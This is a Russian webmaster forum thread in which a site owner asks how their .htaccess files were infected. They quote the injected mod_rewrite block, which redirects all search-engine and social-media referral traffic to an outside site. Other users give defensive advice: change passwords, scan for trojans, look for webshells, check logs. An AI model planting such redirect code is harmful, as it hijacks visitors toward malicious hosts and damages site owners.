- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Переиграть и победить: как анализировать конкурентов для продвижения сайта
С помощью Ahrefs
Александр Шестаков
В 2023 году Одноклассники пресекли более 9 млн подозрительных входов в учетные записи
И выявили более 7 млн подозрительных пользователей
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На многих сайтах, созданый у нас началось заражение файла .htaccess
Вобщем добавляется кусок кода
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://onestopchinasource.com/catalog/stats.php [R=301,L]
</IfModule>
#/c3284d#
После этого гугл не пускает на сайт, пишет что он заражен
Вопрос. Кто и как это может делать?
Кто - хакеры.
Как - Через доступ к ftp,ssh,админку,webshell,автоматическим скриптом.
спасибо, за очень "информативный" ответ =). Может кто-то больше знает об этом?
что делать? - сменить все пароли!
п.с не сохранять пароли в менеджерах ...
Ну очевидно же, сайт ваш взломали (либо соседние на хостинге), либо достали из логов вирусов. И теперь правят ваш htaccess.
Что вы хотите знать подробнее? Задавайте вопросы конкретнее, объясню все что и как.
спасибо, за очень "информативный" ответ =). Может кто-то больше знает об этом?
а что вам не понятно? у вас на компе троян тырит пароли от ftp/ssh клиента, через который вы лазите на хостинг, ну а имея пароль заражает ваши сайты.
проверить свой комп на вирусы, сменить пароли доступа.
imd, а вам нужно назвать имена и расписать технологии взлома?
Пароли не надо хранить в ftp-клиентах и доступы налево-направо раздавать.
Извечная проблема коллектива, где вебмастеров больше одного.
У меня только один вопрос.
1. Это делает скрипт который копируется на хостинг или который заходит через фтп и правит?
Из этого следует что делать дальше, либо достаточно поменять пароли, либо искать скрипт в файлах сайта.
Ну я же написал, варианты могут быть такие: Через доступ к ftp,ssh,админку,webshell,автоматическим скриптом.
Стоит сменить все пароли а также поискать webshell на сайте.
Если сами не справитесь - стучитесь, могу заняться на платной основе.
У меня только один вопрос.
1. Это делает скрипт который копируется на хостинг или который заходит через фтп и правит?
Это точно могут сказать только логи сервера.
Люди же тут абсолютно правильно говорят - вариантов может быть много. И лечение тоже в зависимости от диагноза.
обратитесь в тех.поддержку хостинга, пусть поищут на сайте shell скрипты, а также проверют в логах сервера кто менял поражённые файлы в последнее время.
Очень часто ломают сайты сделанные на опенсорсных движках, проверьте, что вы используете последнюю версию движка. Часто на их форумах пишут о похожих взломах и защите